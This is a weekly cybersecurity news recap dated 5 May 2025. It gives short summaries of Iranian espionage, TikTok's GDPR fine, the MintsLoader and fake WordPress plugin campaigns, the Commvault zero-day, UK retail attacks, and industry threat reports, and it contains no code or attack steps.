Weekly Cybersecurity Recap - 5 May 2025

Introduction:

This week’s cybersecurity landscape brought a wave of critical developments, from nation-state espionage and corporate breaches to evolving malware tactics. Iranian state-sponsored hackers maintained covert access to Middle Eastern critical infrastructure for nearly two years. TikTok was fined €530 million for GDPR violations, and Commvault confirmed a zero-day Azure breach. Meanwhile, malware campaigns are growing stealthier, and SANS laid out the top cyber threats for 2025. Here's your categorized breakdown of the week's most important stories:

Nation-State Threats & Espionage

Iranian Hackers Maintain 2-Year Access to Middle East CNI via VPN Flaws and Malware

An Iranian state-sponsored threat group has been attributed to a long-term cyber intrusion aimed at a critical national infrastructure (CNI) in the Middle East that lasted nearly two years. The activity, active from May 2023 to February 2025, included extensive espionage and suspected network prepositioning — tactics used to ensure persistent access and strategic leverage. The attack aligns with the behavior of Lemon Sandstorm (aka Rubidium, Parisite, Pioneer Kitten, UNC757), a known Iranian threat actor.

Regulation & Data Privacy

TikTok Slammed With €530 Million GDPR Fine for Sending E.U. Data to China

Ireland's Data Protection Commission fined TikTok €530 million ($601 million) for transferring European user data to China, violating GDPR regulations. This fine followed an investigation launched in 2021 into the platform’s compliance with EU data transfer protocols. It reinforces growing concerns around tech companies’ cross-border data handling practices.

Malware & Exploits

MintsLoader Drops GhostWeaver via Phishing, ClickFix — Uses DGA, TLS for Stealth Attacks

The malware loader MintsLoader is being used to deliver GhostWeaver, a PowerShell-based RAT, through obfuscated phishing chains. It employs sandbox evasion, a domain generation algorithm, and HTTP-based C2, with distribution via phishing and drive-by downloads. Payloads like StealC and a tweaked BOINC client have also been linked to MintsLoader’s campaigns since early 2023.

Fake Security Plugin on WordPress Enables Remote Admin Access for Attackers

A malicious plugin named “WP-antymalwary-bot.php” is being disguised as a security tool in WordPress sites to enable backdoor access. It hides from the admin dashboard, maintains persistence, and allows remote code execution — a serious concern for site administrators.

Cloud & Infrastructure Security

Commvault Confirms Hackers Exploited CVE-2025-3928 as Zero-Day in Azure Breach

Commvault disclosed that an unknown state-sponsored actor breached its Microsoft Azure environment using CVE-2025-3928 as a zero-day. Notified by Microsoft on February 20, the company says no customer data was accessed and has since rotated credentials and hardened its environment.

Industry Disruptions

UK Retailers Co-op, Harrods and M&S Struggle With Cyberattacks

Major UK retailers are facing operational disruption due to ongoing cyberattacks. M&S was impacted over Easter weekend, suspending online services while stores remained open. Co-op and Harrods are also racing to restore normalcy, highlighting sector-wide vulnerability.

Reports & Insights

SANS Top 5: Cyber Has Busted Out of the SOC

This year’s SANS RSA session emphasized top threats for 2025 - cloud authorization sprawl, ICS attacks, and limitations in cloud logging and AI usage. Addressing these issues will require not only technical measures but also leadership-level strategy and cross-organizational collaboration.

Zero-day exploitation drops slightly from last year, Google report finds

According to Google's Threat Intelligence Group, zero-day exploitation has declined slightly thanks to improved vendor security practices. While this trend is promising, the threat of zero-days remains a pressing issue requiring continued vigilance across the industry.